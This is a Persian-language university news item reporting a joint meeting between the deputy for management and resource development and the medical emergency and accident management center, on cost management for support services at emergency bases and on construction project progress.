جلسه مشترک معاونت توسعه مدیریت و منابع با مرکز مدیریت حوادث و فوریتهای پزشکی دانشگاه در دفتر معاونت توسعه برگزار شد.

 جلسه مشترک معاونت توسعه و مرکز مدیریت حوادث و فوریتهای پزشکی با حضور مهندس رحیمی معاون توسعه مدیریت و منابع ، دکتر معصومی رئیس اورژانس پیش بیمارستانی و مدیرت حوادث ، دکتر نیاستی مدیر برنامه ریزی و بودجه ، مدیران فوریتهای پزشکی و کارشناسان ستادی در دفتر معاونت توسعه دانشگاه برگزار شد.

مهندس رحیمی معاون توسعه مدیریت و منابع دانشگاه ضمن تشکر و قدردانی از زحمات و تلاش های شبانه روزی همکاران در مرکز مدیریت حوادث و پایگاه های فوریت های پزشکی سطح استان نکاتی را در خصوص شرایط موجود، لزوم نظارت بیشتر مدیران برمنابع و هزینه ها ، اصلاح فرایندها بیان کرد و افزایش همفکری، همکاری و هماهنگی موثر و بیشتر حوزه های مختلف دانشگاه را خواستار شد.

وی در ادامه با اشاره به سیاست های راهبردی مدیریت منابع و مصارف وزارت متبوع  و دانشگاه، در خصوص طرح پیشنهادی مدیریت هزینه امور پشتیبانی در پایگاه های فوریت های پزشکی توضیحاتی را ارائه کرد.

دکتر معصومی رئیس اورژانس پیش بیمارستانی و مدیر حوادث دانشگاه، ضمن تشکر از معاونت توسعه برای برگزاری جلسات مشترک، توضیحاتی را در خصوص مسایل و مشکلات جاری مرکز مدیریت و فوریت های پزشکی ارائه کرد.

در ادامه مهندس طاهری مدیر دفتر فنی دانشگاه، گزارشی از وضعیت پیشرفت پروژه های عمرانی و اعتبار مورد نیاز جهت اتمام  پروژه ها را در این حوزه ارائه کرد.

در پایان مدیران فوریت های پزشکی نقطه نظرات خود را در خصوص اجرای برنامه مدیریت هزینه امور پشتیبانی بیان کردند و به بحث و تبادل نظر در خصوص راهکارهایی برای رفع موانع پرداختند

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>

ارسال نظر شما

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *